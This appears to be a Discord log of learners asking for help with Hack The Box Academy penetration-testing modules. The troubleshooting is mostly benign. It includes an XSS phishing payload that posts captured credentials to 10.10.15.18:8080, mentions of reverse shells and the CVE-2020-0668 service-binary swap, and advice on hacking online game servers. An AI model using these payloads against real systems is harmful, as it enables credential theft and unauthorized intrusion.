#modules
try without sudo
i suspect the problem here is that you're using an old tool (crackmapexec) and its trying to rely on python libraries that have since been changed/updated
what about this one
ahan after updating it will solve?
single quote your password
tried not worked.
yeah
i think i have to spawn the target again
btw how can i update py library?
we need to find out if the problem is your command, or if its overall network connection, etc.
yeah just trying by terminating target
or you could use wireshark and see exactly what's happening
Exploit the target and find the hostname of the router in the devicedetails directory at the root of the file system.
can anybody help
Hello
ah by spawning target again nxc works fine. @west canopy thanks mate
its from shells and payloads
Any game hacker here??
which page?
topic infiltrating unix
.
wait i am checking
go ask in general, it is module section
it is illegal. @sturdy hamlet
u can find it is root directory
OK but it's showing that I can't chat in general
this channel is for discussing HTB Academy . Not hacking anything else .
native language other than english is ban here.
but if you want to learn: https://academy.hackthebox.com/course/preview/game-hacking-fundamentals
@potent lotus have u upload rce?
Can I poke my head in for a question on Linux fundamentals or am I waiting my turn
done
Just ask
im in the
come in dm
There's not a queue to ask questions
Thanks guys
yeah ask buddy
I'm looking for some help under firewall setup the first question is asking me to start a web server on Port 8080 and here's the steps I've tried so far:
I've tried running HTTP 8080 failed
module and section?
Linux fundamentals, firewall setup
ahan lemme check
Python - m HTTP.server 8080 kinda failed, it started the server but I couldn't interact with it at all
And just tried Apache2 - k and it didn't run
have u tried python3?
try this one "python3 -m http.server"
also is this on pwnbox or your own machine/VM?
Pwnbox
python3 -m http.server 8080
try this one @stone bison
Started the server
or if you want to use apache, you can edit /etc/apache2/ports.conf and have it listen on 8080 instead of 80
└──╼ [★]$ sudo cat /etc/apache2/ports.conf
# If you just change the port or add more ports here, you will likely also
# have to change the VirtualHost statement in
# /etc/apache2/sites-enabled/000-default.conf
Listen 80 # Change this to 8080
<IfModule ssl_module>
Listen 443
</IfModule>
<IfModule mod_gnutls.c>
Listen 443
</IfModule>
apache kinda feel boring .. for file transfer purpose.. 🙂
great.
It's not letting me input commands
wdym?
In the console I started the server in it's not taking commands or at least not showing me any returns
yes, you have to let it keep running
open a new terminal tab if you need to type other commands
just keep running it and by another bash shell make a file connection toward that connection
Oh my God, thank you guys so much
fast response.
u can ask any question about modules here.
BUT if you do want it to run in the background: python3 -m http.server 8080 &
Absolutely I appreciate you guys
by default it run on port 8000, but u can specify a port to run on that one
Can some explain why does it gave open|filtered. i got confused
simply means nmap is unsure whether they are open ports or not.
thanks and i realised what i missed haha thats why got confused
im having trouble setting up subbrute and using subfinder. anyone who can help? im on the attacking common service module.
getting error on setting up subfinder?
I guess that may have been it. Not Dutch, this name is common in Czechia too.
kind of. have you done this module? i could use some help
not done this module yet. but have used subfinder along ago
can u dm screenshot of your problem? maybe then i can help
Ah okay didnt know that. its common dutch name as well.
Name of da kings!
I’m currently working DETECTING WINDOWS ATTACKS WITH SPLUNK chapter detecting password spraying. I found the answer but i don’t understand how? In the answer I tried the users and there was the answer. I copied the spl syntax in SPLUNK and was trying all the users. Was this the correct way?
Anyways, on Discord, I got by Grimgor Protocolsspoofa. I think HTB is forcing the website name to show up instead.
Yes seems like it.
alright
Hi everyone!
I need your help, guys. I'm absolutely stuck on the Intro to Assembly Language skill assessment - Task 2.
|| Here’s what I did:
I fixed the code and removed the exit part (as mentioned in the tip).
I assembled the code, linked it, and wrote it to a .bin file.
Then, I tried to generate shellcode with msfvenom.
Finally, I sent the shellcode to the server using an nc connection. ||
Can you tell me where I might have gone wrong?
ABUSING HTTP MISCONFIGURATIONS : Advanced Cache Poisoning Techniques
Hey guys!
Currently working on fatget.wcp.htb, but unfortunately couldn’t find any solution at the moment.
Can I have a hint please?
does anybody want to be my first friend ?
no
this channel is for getting help on modules
that is why i want to get to know people , so if you do not want to be friends do not reply ty
yep
Ask what you need?
In the module 'Wi-Fi Penetration Testing Basics', section 'Bypassing Mac Filtering' --> running the 'sudo airodump-ng wlan0mon' command on wlan0mon doesn't work for me (in the screenshot), even though it is the interface that appears in 'iwconfig'.
do anyone has any idea how to proceed?
The error message provides enough information to understand why the command doesn't work
Try displaying the interfaces present on the machine, if there isn't such an interface create one automatically using one of the tools mentioned in the module
Very Well, Thank you
Hello all! Just starting out with HTB on my professional development. I am working though the vulnerability assessment module now, when it says: Nessus can be accessed at https:// < IP >:8834 what IP address and how do I find that if I am using the pwnbox Virtual Machine?
same section, second question - once I reset wlan0 according to the found hidden network MAC address, I should find the wifi password by myself? because the password in the section's guide does not work
just tested the password and it is working
File Inclusion module
Basic Bypasses section
I'm using firefox, from two days ago till now whenever I deploy a target on any module that has a web app, it wouldn't load on firefox (it just keeps loading) while working on other browsers.
Well then.. I did get the wlan0 interface with the wifi MAC from the first question, I'll look again for what I've missed...
Did you forget you've set a proxy? Other than that clear the cache is worth a try.
Figure it out? Try scrolling to the bottom and starting the lab. You'll be given the IP address once it starts. You're in the right place for help with modules, but visit #welcome to link your account and get full access to the discord.
Hi HTB Community,
I’m working on the Introduction to Python module and need help with a question about finding the third most used word and the most frequent word in a given text. I’ve written my code but every time I submit it, I get an error saying it’s incorrect. I’ve tested it in a local Python environment and it works fine there so I’m unsure what I might be missing.
Hello guys, I've got some sort of stroke with this question on Splunk queries.
"Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all data any suspicious loads of clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format: _.exe"
I can do the first part of the question with: index="main" *clr.dll | stats count by Image
I get the result (on the screen), obviously there're SharpHound.exe and randomfile.exe, which call fair amount of suspicion. However, I do not really understand what to do next with it (it doesn't accept neither of them as answer), I investigate further and see that all of them have event code 7 for loaded image but no relation to C# injection or execute assembly attack.
Could anyone please hint me with this one?
Ty for replying, I tried to clean the browser cache and it didn't work, then I intercepted the request from Mozilla and chrome to see the difference and it was in the Accept header on the request.
Mozilla :
GET / HTTP/1.1
Host: 83.136.250.78:57974
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Chrome :
GET / HTTP/1.1
Host: 83.136.250.78:57974
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
When I intercept the http request then edit the Accept header to be like chrome the site loaded successfully.
I don't understand why Firefox doing this.
Hey, does anyone know why I might not be able to RDP into this host? I'm using the username and password provided
Are you connected to the vpn?
Yes I am
Hey, I'm doing Module "Password Mutations" (https://academy.hackthebox.com/module/147/section/1391) right now.
Is it intended to take that long to brute the pw of user sam?
[STATUS] 88.06 tries/min, 5548 tries in 01:03h, 88498 to do in 16:45h, 14 active
I don't study http headers enough to be absolutely certain but the accept header looks fine in both. Chrome does have a cache-control value. What if you shift+ctrl+R? That will set Firefox's cache-control to no-cache. You don't have any javascript / ad blockers? Maybe packet cap. Are you even establishing a TCP connection?
Do other webpages work? Very weird issue. 🤷♀️
Wait actually no, For me It took 15 minutes +-
thx. The question says "create a mutated wordlist"... i downloaded the ZIP and did hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list.
Did i get this wrong?
I DMed you
Hey so my school doesn’t pop up when I registered, what is the best academy subscription other than that one I guess
Contact support. Https://help.hackthebox.com/en/articles/5987511-contacting-academy-support they might be able to add it if the school matches the requirements
Something strange with my HTB accounts. I have created two accounts so far, and each time I log out, it won't let me log back in. It claims the credentials are incorrect, even though I just made the accounts minutes ago and know exactly what I used. Why is this happening?
Hi Guys i am stuck at Attacking Enterprise Networks -> Web Enumeration & Exploitation 6 & 8
Use the SSRF to Local File Read vulnerability to find a flag. Submit the flag value as your answer (flag format: HTB{}).
Use the XXE vulnerability to find a flag. Submit the flag value as your answer (flag format: HTB{}).
I dont know how to discover what the name is of the flag
Can someone help me ?
Basically the exploit is in the file upload or reading, ssrf with burp:):)
Then you get the flag after exploit?
LOl nevermind both were in /
and they both were called flag.txt
i thought they had a different name.
I was thinking way too complex
Happens
Don't spoil things from AEN, the module itself is the walk-through
The login works from my phone but not my computer. So I guess the accounts didn't disappear. But on my computer, it claims the credentials are incorrect and won't log me in
Also heavily suggest doing that module blind if on the cpts path
Need to speak to a person? Learn how to reach our support via HTB Labs.
^
stuck in broken auth skill assessment, i have found the creds but i think this is not the right path
can anyone help?
You can send me a DM with what you have identified and your potential path.
done, ty
In Getting Started Section > Knowledge Check, I obtained my initial foothold on the system, but I don't have access to any commands like: wget, sudo, apt, su, python, python3, etc. Pretty much everything except cat, cd, and ls. Even when looking at what is installed under /bin and all of the packages we are used to. But still am not able to use them when using absolute pathing.
I also tried using the ||upload_exec|| exploit with the password I got from ||admin.xml|| but that isn't working either. Feel like I'm missing something.
Can anybody help?
What could help you with privilege escalation?
LinEnum or LinPeas, but I can't upload them, right?
I can't check what commands I have access to, or setup a reverse shell
sudo -l
If you did the steps by the instructions, You should have established the foothold via meterpreter. Try enter 'shell' in it for more available functions.
after the shell, Improve your TTY via python:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Linenum and linpeas spits a lot of data out that can just be annoying
I can't use sudo, it says its an unknown command
??
I established foothold, and was able to navigate to user.txt, but that was just through using cd. But I can't access root.txt
one sec
Anyone has the bloodhound default creds for the pwnbox ?
That is because you need to escalate the privilege first.
The 'shell' command is just to improve the restricted meterpreter to proper shell with more functions such as 'sudo -l' and more stuff
neo4j neo4j
Ok, ill go through this. Thanks!
Finally! After 10 weeks, putting in 10-12 hours a day, and writing 356 pages worth of notes. I have finally completed the Penetration Tester Job Role Path!
You know sometimes I get stuck on something that everyone else here be like “oh yeah this is the! Oh yeah I got it it was sooo easy ..” and I get upset at the world for taking so much of my time like work and friends and things like they are the ones that made me fall in love with hacking but then after days or weeks I get to the solution
And it’s a journey that I like so much also cuz I learn so much along the way
Even if I know the answer and htb says it’s not and apparently it is the answer I just had a space before or after! Or cuz I was completely wrong
But maybe just maybe you guys have advices for me.. so how do you guys deal with wrong answers and what is your approach for finding solutions?
I’ll be much obliged if you have answers for me to be focused or something
Peace! ✌🏾
does cme have a native way of getting the user list to a file or do i need to use some weird bash piping?
Above is the output of smbmap and below i am manually testing for a directory with write permissions is there any way to automate this?
Can't smbmap see permissions to subdirectories also?
If you have creds you could try crackmapexec with --shares
Hi , I need hint for [Resource Lab ]
i am on the same thing and the spidering section cost me sometime cuz it doesnt work probably
had to search the smb share file by file
🙂
Which module/section was that?
which section/module?
AD skill assessment 2
Ah k, its possible to mount a smb share, which makes it easier to look for files.
didn't check if that user had rdp connection, but it is a way for sure
First section 🙂
I need hint for start
Use netexec
whats happened with cme?
Not maintained anymore.
Hi , I need Hint for Resource Machine,
Please give me hint :)))))))
module "getting started" section "public exploits", i can find the service is Apache 2.4.41, but i can't find this version exploit in metasploit... any idea?
the linux box inside the network of that lab only had cme and i didn't bother transfering nxc
ask there
Yeah I don't like those provided boxes, so I just use them as a pivot box and only to run responder and the like.
Can i Ask Question, in dm ?
that was a Path Traversal iirc
i didn't solve that machine so idk
but ask there and u will find someone
google is ur friend, just type this version into it and u will find it
Look closer at the web page
Wtf so obvious am I missing? Where am i supposed to find jeffs pass ? https://academy.hackthebox.com/module/67/section/1637
In the question before, You got to the flag's page, correct?
If so, look further in that page.
omg...thank you very much
Hello. I'm trying to do a module, but right now, when I spawn the target for the module (this also has been happening on labs too for me), it keeps giving me a public ip address with a port number instead of a private IP address like I normally get for the target. Any ideas why?
in windows privesc module section kernel exploit
for the CVE-2020-0668 everytime i run the service i get the connection back to my attack machine but i lose it as soon i get the error from the service saying "The service is not responding to the control function" did you face this issue ?
i know that i can create an account instead of getting a reverse shell but i just want to ask this just to know if i missed something or this is normal for this attack
Can you show the commands you used or screenshots so I can get better understanding of your problem?
i swapped the binary as shown in the section then i started multi/handler on my attack host then i ran this on target host "net start MozillaMaintenance" which send a connection back to my attack host which i received until i get the error message from the service i ran on the target host then i lose it
Because some targets are assigned private and some are assigned public with a port. As for the why, well it's probably easier for them to host a ton of labs on a public IP using ephemeral ports, as those labs aren't locked into requiring an AD environment or similar environment.
I DMed you
When I try to ping it, it says "Name or service unknown".
I dont have issue pinging my own network or 8.8.8.8 or anything else.
Also, does nmap still work normally with a port specified? Since we are scanning ports, does that work the same? (sorry for beginner questions, I'm just confused about that since it makes no sense to me).
@sand rose You sure about that? 'dont' should be 'don't'.
Hmm, not quite. 'nmap' is actually 'map'.
You shouldn't have to run nmap on that type of lab. Which module/section are you working on?
AD attack & enum assessment 2
on the SQL01 machine i got local admin and dumped the sam db but it didn't include all users, how is that possible?
Oracle TNS Footprinting section
"I'm Currently In The process Of Becoming A Ritch And Wealthy Canadian Citizen
What local users are missing?
i believe SAM only contains local accounts. For domain users, you would need to dump the NTDS.dit on the DC.
you could try dumping LSA, there might be some domain user hashes there
l**_adm
yeah i mean local users
Will there be an AD path room?
if you mean a dedicated text channel, there will be one once the cert is officially announced
Yeah for the new Active Directory Penetration Tester. I start Monday, so I wanted to see if there was going to be a new channel for that particular path.
Thank you
Did you ever figure this out?
No the form never showed up for me but I was able to solve the potion and I understand the concept so I guess that’s the point.
You can't just use the code from the module. It can be done but you need to tweak the payload.
Windows Privilege Escalation
Credential Hunting
Search the file system for a file containing a password. Submit the password as your answer.
I found the file, however the password inside it didn't solve the question
my guess is that isn't the password it's looking for
i found the stuff one and the web one
Webrequest module:
curl 'http://94.237.59.180:36838/search.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Referer: http://94.237.59.180:36838/index.php' -H 'Content-Type: application/json' -H 'Origin: http://94.237.59.180:36838' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=1v5a2airpllfll64aa61ssfuao' -H 'Priority: u=0' --data-raw '{"search":"london"}'
Returns ["London (UK)"]%
curl 'http://94.237.59.180:36838/search.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Referer: http://94.237.59.180:36838/index.php' -H 'Content-Type: application/json' -H 'Origin: http://94.237.59.180:36838' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=1v5a2airpllfll64aa61ssfuao' -H 'Priority: u=0' --data-raw '{"search":"flag"}'
Returns []%
So the flag is []?
both are not working
Yeah probably isn't the right password then..
tbh even if there is another file the stuff one should be an answer or at least the password be a "not this one" cuz it is really badly designed question that way
I just re-did it, found the pw.. make sure you look in more places
solved it but it is really confusing
I hope if they can change it cuz the other password are just a meaningless rabbithole
I have been working for hours in the Cross-Site Scripting (XSS) phishing room, I tested in the /phishing extension, the payload works, but all the payloads I send to send.php fail “Invaliad”
'/><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.15.18:8080><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--
my payload
Yeah I figured it out so it’s not an issue now.
Probably because there's already a script tag and you are adding a second one
do i get to keep the completed modules which is part of annual subscription? (Thanks)
Yes, any module you complete is yours forever to keep, even if they update it.
Firewall and IDS/IPS Evasion - Easy Lab (stuck on Target(s) are spawning for 5 mins) and got cancelled for no reason
My target did the same thing, could be a site issue
u did something to fix it or it got fixed on its own? lol
yea worked lol that was weird
E
Cant get the answer to this
What i have tried :
||The same command from solution(not getting results)||
||-sV flag||
||its showing its open but scripts not working or something ||
Does anyone else get this error in the Pivoting tunneling and port forwarding module, ICMP Tunneling with SOCKS section? I've recompiled the binary 3 different ways but I always get this error on the pivot host
I've attempted the sed compilation method, sudo ./autogen.sh as well as sudo ./compile && make
The program works on my attack host, just not on the pivot host
according to the error you didnt closed a bracket (thats why its saying syntax error)
If that were the case it wouldn't run on my attack host, but it does
Looks like it's because it's a C application and my kali pentesting VM has a different glibc version than the ubuntu host, leading to a mismatch. It's reported as an issue on the forums (https://forum.hackthebox.com/t/icmp-tunneling-with-ptunnel-ng/268732/9) and it seems like the fix is to either recompile it in another VM that has the same glibc version, or to use a basic dynamic port over SSH with proxychains to get the flag
yea version mismatch of glibc does matter
i prefer compiling it on the target machine tho (if its possible)
Hello. I'm trying to connect to HTB for the SQL injection module, and I'm having issues. Firstly, it's spawning a Public IP address with an ephemeral port (which I've never seen HTB do). Secondly, when I go to ping the target, I'm getting an error saying "Name or service not known". It's the "Intro to MySql" section. Anyone able to shed light?
open it in your browser @sand rose
the public ip + port is because its a docker instance just for you
I used the original in addition to a couple of other IPs (by resetting it) and it tells me the connection was reset in my browser
let me check on my end, one sec
Sure thing
oh my bad, you need to do it with the mysql client on the cli
so example mysql -u root -ppassword -h publiciphere -P porthere
Am I not able to just ping it like normal? (Whenever I get a target, I usually ping to make sure my connection is good).
Not always no
sometimes pinging is not reliable
typically if it's a windows machine it's not enabled
Gotcha. Is this also why I had issues with nmap too? (I know it's a MySql module, but it's more of a habit I have that the moment I get a target I go ping, Nmap, see what I'm looking at, then proceed with the module at hand).
And if I may: Whats the difference between using a ping/nmap packet(s) vs using the cli with mysql. I ask in the sense of aren't they all packets that the server would need to respond to? How does it typically detect what's me trying to connect vs sending a ping?
Different types of packets
Is http://94.237.59.180:48643/ in web request broken? It pings but it's just a blank page
probably another endpoint you need to navigate to
yeah, the section shows it's using api.php, try that
Alright
Module: Signature Wrapping Attack
Does anyone try that module? I can’t exploit successfully…
Hiiii, i need support with the last Active Directory Skill Assessment exercise, im having a problem with the rdp even if i restart the target
i try to resolve it by myself with stackoverflow but no luck
just port forward it to ur machine
kinda unnecessary, it shouldn't be like this, I read the solution and so far it doesn't mention anything about portfw, it's a problem with the target itself
I'm doing Android Exploitation track: pinned says error parsing package
Even if portfw works, there is still a problem with the target, since that is not the "canonical" solution
If you are in an SSH session you simply cannot perform an RDP command within it
The error is comprehensive enough to mention that there isn't a display variable set
^
I did portfw and got rdp, kinda weird but it worked, thanks @autumn pilot @midnight galleon
@grand portal no spoilers; also try visiting it (after adding it to your hosts file)
I did put it behind the ||hidden|| like this. Is that still wrong?
I actually added that to my hosts file nothing showed up, I'll try it again, if it supposed to.
Spoiler text does nothing
Did you try curl?
Okay.
No, what does curl do different than actually visiting webpage?
Just uses a different UA
UA?
User agent
Under Armour
okay
curl is not producing anything, tried port 80 and 443 ports. is it the right subdomain im enumerating?
this is how my hosts file should be. right?
blurred is another subdomain that i found.
Make sure no spelling errors
Hi guys. Just asking about the debugging section of the introduction to malware module. I have followed all the steps and consulted the forums but cannot seem to get past the "sandbox detected" message. If someone here can help it would be appreciated
yes. i did. im currently trying to explore more subdomains.
did you carefully added breakpoints?
You don't need to
all i need to is query the subdomain i found properly?
yep. followed the direct instructions, and put it in a new exe as the forums suggested.
you are stuck at the first breakpoint. right? are you sure your breakpoints are working? did you remove the instructions that led to sandbox detected as instructed in the module?
I havent removed anything. Only changed the values like instructed
by the first breakpoint do you mean first one brought up on the actual module or the first place where my program stops?
program. are you using pwnbox?
nah running of ubuntu directly
ild try that. Thanks for your help
it did not work in my case, i had to use pwnbox.
good luck
okay ild try pwnbox.
what would change from my device to pwnbox tho?
something to do w inetsim?
probably, i dont remember the details. I had trouble setting up inetsim on local machine, worked well in pwnbox.

Bingo
no it is just that the pivot box sucks
and generally yeah, in real engagement u won't have much control of these pivot boxes
thanks it worked.
What exactly is the Windows fundamentals question asking me? "Which Windows NT version is installed on the workstation? (i.e. Windows X - case sensitive)"
It wont accept Microsoft Windows 10 Enterprise 10.0.19041 or Windows 10 Enterprise 10.0.19041 or Windows 10 10.0.19041 or 10.0.19041
Windows 10 19041 or Windows 10.0.19041 is also not accepted
What format does it want?
So it's literally just fucking "windows 10" errr eyeroll
Hello, I am stuck in the "Network Enumeration with Nmap" module on the hard lab and I can only see ports 22 and 80, I have tried a lot of combinations of what i learned in the module but i had no luck finding the flag. Can anyone help?
In 'Firewall and IDS/IPS Evasion' section they talk about another port. take a peek in that.
I'm gonna suggest to be more broad
Replace the specific port with -p-
I have tried -p- argument but it takes way too long to finish
It shouldn't
oh am i doing smg wrong here it takes forever? i tried to reduce the time with several stuff from the performance page and it only returned ports 22 and 80.
interestingly i focused more on the port 50000 and after adding some arguments i managed to get it open|filtered but when i try to put arguments like -sV it appears closed
I remember in that module using -p- didn't work for me back then. Maybe I should revisit that module 😅
-sS
Also you need to use a source port 😉
yepp i used source port 53
on tcp scans the ports shows as filtered so i used the -sU
Can anyone tell me the first question of the skill assessment of "Stack-Based Buffer Overflows on Linux x86"?
It asks "Determine the file type of "leave_msg" binary and submit it as the answer." but this question is too vague. I know it's "leave_msg: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=8694607c1cba3fb3814a144fb014da53d3f3e49e, not stripped" but I can't figure out the exact answer...
Hi, I cannot find the flag in the Repeating Requests in the Using Web Proxies module. The hint denotes that it is in a subdirectory. I tried the public directory, there are just one html and one ss file, none of them contain the flag. I suppose, that the flag is in a file called file.txt. Can somebody tell me where I need to search for the flag?
Hello. I'm having issues connecting up to the mysql database for the htb academy module. I'm trying to connect to it the way it tells me, but I keep getting an error saying "Can't connect to local server through socket '/run/mysql/mysqld.sock'"
Im connected to the vpn, and my internet connection is also fine. I've been trying to use the IP:Port format and using -P to specify the port and it's to no avail. I'm not sure what I'm doing wrong here.
Have you port scanned? Make sure the port is responding to requests. Sometimes it helps to restart the lab and redownload the VPN -- or change regions and perform both actions again. Just some suggestions, you'll have to do a little troubleshooting when something unexpected happens.
@shut vapor I've done the following: Restarted the VPN connection, restarted the Virtual Machine (Using VMware). Redownloaded the VPN connection. Tried connecting without the VPN connection (the target was showing as a public IP so I figured to try that). Tried various cli inputs the module showed to tried to connect up to it.
When I go to ping it, it says "name or service unknown". Nmap keeps showing "host seems down".
Ive done the above with multiple targets (all giving me a public ip and an ephemeral port).
I tried both defaulting to the localhost server and docker.hackthebox.eu (something in the module that showed as a cli to try to connect up). All of it has been to no avail.
If you're not able to ping or verify open ports something's wrong but it's hard for me to offer further troubleshooting advice. As a sanity check sometimes I try in the pwnbox to make sure it's something with my system.
The target is public though? What module and section is this?
the sql injection module "Intro to mysql"
the target is 94.237.59.180:55372
So I opened pwnbox (through firefox on my VM)... and I can ping it just fine from there?
I just tried pinging again from my VM and now I can ping it just fine... when I use nmap on my VM it says the host seems to be down.... when I use nmap from within pwnbox (from inside my VM), I can scan it properly. Any guesses?
I see, the target is a docker instance
it is a public IP so if you can't ping / otherwise interact with that IP from your VM I'd bet you can't interact with anything really.
If you can do it from pwnbox it's definitely your VM. I fired up the exercise and connected so I know it works. I would expect you to encounter an error you must overcome, but it's not the one you reported.
It's weird because I can ping it from my vm but not nmap it weirdly?
I can also ping and nmap my own local network perfectly fine from my vm as well, so I'm sincerely not sure. I'll probably just finish it through pwnbox since that seems to be working normally... I'm just sincerely not sure what the issue is.
I appreciate your help though :).
this is a Docker Container. Only this one port is available to you. If you ping the machine, your target does not respond, but the host machine does. However, this has absolutely nothing to do with your target.
Hello, I just created an account in HTB academy and it's not letting me go through the paths
What exactly do you mean by, it won't let me go through the paths?
When I put the cursor on Paths, it says javascript: void(0)
I'm confused here... imma go learn about what dockers are and how they work before coming back to this. I appreciate your help :).
In simple terms, a Docker container simply provides you with a service, for example a web server.
Several Docker containers can run on one server.
Turn off all AdBlockers and reload the page.
I am doing the windows command line module and i am having a problem with a question "What command will give us a listing of all files and folders in a specified path?" i have tried dir , dir /A , tree , tree <path>
everything is wrong what is the correct answer here
is container track deleted? in app.htb
Have a look at the cheat sheet.
cheat sheet also mentions the same commands that i have tried
got it done i was putting a wrong parameter to the command
#spoiler Hey in the attack enterprise module on the active directory compromise section we would add a user ttimons onto a target group after that i try to dump the ntlm password hashes using secretsdump ttimons and use ttimons password we get after cracking a hash but it errors out
would appreciate spoiler tags on AEN questions
Any help
is there a possibility to create separate channels for each module? the current state of modules chat makes the search for information on a specific module frustrating to the point it is better to just ask copilot even though it is bad when it comes to such knowledge..
having a dedicated channel for every module eases the process of asking, answering, searching for previously asked questions tremendously
there are over 100 modules, it is not feasible
additionally, in a single channel your chance of finding something relevant is higher
Hey guys!
https://academy.hackthebox.com/module/143/section/1489
when I run mimikatz I'm getting ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5) (after runas). I even tried re-spawning the target but still same.
Are you running as admin?
yes
Me too. Have tried many combinations and I can't pass it...
did you use privilege::debug
yes
i believe that exception means access denied, so your user probably doesn't have the privs to perform a dcsync
but I'm running on adunn's session (runas)
Also on a side note - why are there 2 machines spawned - ACADEMY-EA-MS01 & ACADEMY-EA-ATTACK01?
read the scenario setup section
I cannot ssh from MS01 with same credentials?
but I should be doing the same with mimikatz too?
@cloud urchin any suggestions?
can you ssh with the creds it provides in that part of the section
i tried that too, no luck. confirmed by pasting in a notepad to see if its there in clipboard or not
i mean that's what it says to do, not sure without checking it myself but i'm busy right now unfortunately so i can't test it for you
iirc i think i had to use pwnbox because of the way it scrolled the terminal when running mimikatz through that ssh session
the only reason i find it feasible is grouping all relevant information in a single place
i hate when rdp doesnt work
let me try from pwnbox
same error
How can over 100 channels just for modules be moderated in a meaningful way?
This is not feasible
if you mean who will answer questions, the community will, most of the questions are already answered at least once, so scrolling between all relevant information until i find someone talked about specific thing would be easier (because discord doesn't have information retrieval system aka search engine to assist in the search functionality)..
but if you mean moderating the exposed content on the chat, then it will be almost impossible 🙂
I'm not worried about the questions.
But how are we mods supposed to find indecent content in over 100 channels?
That is impossible.
yeah if it is manual moderation then its impossible
hey guys i had less of a hard module question and more of a soft one, i'm almost done with the Linux Fundamentals module. And this last bit is comparing and contrasting Solaris vs. Linux. How important is understanding the differences between the two systems? Should i take notes on this section or should i just move on?
You can also quickly find the difference between Linux and Solaris with a search query in a search engine of your choice. You probably don't need any notes. It is only important to understand that there is a difference.
cool thanks man
I'm just curious (if there's any HTB staff around), do you make the art on the cover images of the modules in academy yourselves?
The art is in general very awesome, and I was wondering if it's copyrighted or something. I was thinking about having something from there printed on a shirt because the aesthetics are too good, so I wanted to ask to see if it's not an issue for me to consider at some point of time
if you stay till you know every unmentioned detail you gonna do HTB academy absolutely forever.. you need to know "just enough", details come over the time 🙂
i'm willing to do the work for the fundamental stuff, like learning Linux and Windows better. because it's fundamental, and that effort will translate to more than just pentesting, but you're absolutely right i don't want to do this again
There is a search bar by the way, and you can include search parameters ("contains word: wordpress, before:yesterday, in: #red-team "), etc.
I've found that it's generally helpful when searching for some particular topic, such as a challenge name or a topic name
oh cool!, where can i find the full list of the discord search parameters?
i thought there are only the basic stuff such as from:@user
Think it depends on the device, but you can see if you're on PC (I'm using browser on PC)
If it doesn't work with one tool/technique/method, try a different one.
Attacking Common Applications
Exploiting web vulnerabilities in thick client applications
So...I modified the Invoker and the ClientGUI thingy, compiled it and made the traverse jar, instead of doing it 1 by 1 and taking time.
For some reason, the .jar displays the content of the file instead of downloading it. I have used the 1:1 script provided in the module, anyone got an idea what could be the issue?
If someone is down, I can even stream my actions 1 by 1 to see what's wrong, but I am stuck for about 2+ weeks on that.
Hey anyone know the path i should take if i wanna hack online games(server-sided)
I wouldn't condone that.
Holy shit the last module before skill assessment in pivoting is so fucking slow
Give it time to load.
Yea ive given it way too much time
I'm trying to upload a file it's literally taking me 30 minutes just to type commands and extract the zip file
Hey GodBreak.
- Get into the Hacker mindset; you have to learn to think deeply about how games work and how you can hack them
- Learn programming languages required: C++ Is what the online games are in, and then you can learn Python for your own programming when attacking things
- Time to put your knowledge in action; start reverse engineering, doing static and dynamic analysis on games and applications -- starting from small stuff and reaching to big stuff
Please do not randomly assume that people who are learning here are being or are going to be illegal.
Game hacking is taught by HTB, and HTB does NOT condome learning how to game hack.
Please do not discourage people from using the HTB modules by scaring them away.
they asked for server-side game hacking. that's not taught by HTB.
those two modules are for hacking games offline/client-side
and hacking server-side without permission is the same thing as unauthorized testing, which is illegal. cheating in online games isn't something that HTB condones either
Stop telling people not to learn -- and stop telling people that they are illegal
But thank you for the reminder I apologize. Illegal hacking is not okay
oh, i misunderstood. disregard what i said
Does anyone know Nmap
sorry, made a mistake. i unfortunately don't know the path but here's a list of resources that may be of use
https://github.com/dsasmblr/hacking-online-games
Whats ur question about nmap
Yes my good man I was trying to say that if I scan a network or a website the results what can I use it to do
Because I already have a lot of results with me

Which module ur on
You are talking about the machine I'm just using Windows but if you're talking about the version of the End map let's just say is the updated one like if you want to download it you just see the one they just recommend to you or maybe I'm the one out of line if you can be more specific please
What are you hacking / attacking with nmap
(btw just recently discovered its illegal to nmap anything without permission)
Cause in the law it says any snooping is evidence that u want to invade privacy or steal stuff
The website you can use to test the tool
what module
Go to HTB ACademy and learn professionally from the best training
Instead of nmaping that website
- You can then check service versions for available CVE (public exploits)
- U can fingerprint (check quick check) the services to get more info about them
- U can then use tools specific to the services to attack them more
- U can start accumulating data from the services
but the cached result in Google states that the page was made for testing Nmap installs and learning more about the tool
And about this message before I like installed in some few days ago I tested it in some website and I promise I did not take anything from that website seriously am I still going to jail
but yea, this doesn't concern an Academy module
